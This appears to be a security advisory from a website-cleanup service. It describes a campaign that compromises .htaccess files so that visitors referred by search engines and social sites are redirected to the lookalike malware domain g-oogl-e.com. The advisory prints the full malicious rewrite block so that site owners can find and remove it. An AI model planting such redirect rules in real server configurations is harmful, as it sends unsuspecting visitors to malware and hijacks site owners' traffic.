• Malware Faking Google (g-oogl-e.com)

    Malicious hackers are compromising websites in droves. Over 6,600 websites are hacked everyday and begin distributing malware to potential customers and visitors, destroying their owner’s online reputation.

    In the vast majority of cases, affected website owners are completely oblivious to the fact that a malicious hacker has used their website to infect their visitors. In this article, we will discuss a new strain of malware that has already infected thousands of legitimate websites (at least 1,163, at last count, are affected by g-oogl-e.com).

    What does this attack do?
    This particular attack infects the .htaccess file on web servers and redirects visitors to sites serving malware.

    One particular website used to spread the malware is g-oogl-e.com, which plays on the google.com domain name in order to trick unsuspecting visitors into trusting the site. See below for a list of the malware host sites and their associated internet addresses (IPs).

    Malware hosts:


    Take Action
    Administrators and website owners need to protect the reputation of their websites. As a first step, you must remove the malicious configuration from your “.htaccess” and “index.php” files on your hosting account.

    If you choose not to take action, visitors to your website and potential customers may infected with malware, your website will be blacklisted by search engines like Google, Bing, and Yahoo, and your reputation and revenue will take a nosedive.

    A compromised “.htaccess” file will have entries that look like the ones below:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*gooo?gle.* [OR]
    RewriteCond %{HTTP_REFERER} .*ask.* [OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
    RewriteCond %{HTTP_REFERER} .live. [OR]
    RewriteCond %{HTTP_REFERER} .twitter. [OR]
    RewriteCond %{HTTP_REFERER} .linkedin. [OR]
    RewriteCond %{HTTP_REFERER} .myspace. [OR]
    RewriteRule .* http://g-oogl-e.com [R,L]

    The malicious redirects found in “.htaccess” files on compromised website accounts must be deleted.

    We Can Help!
    If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.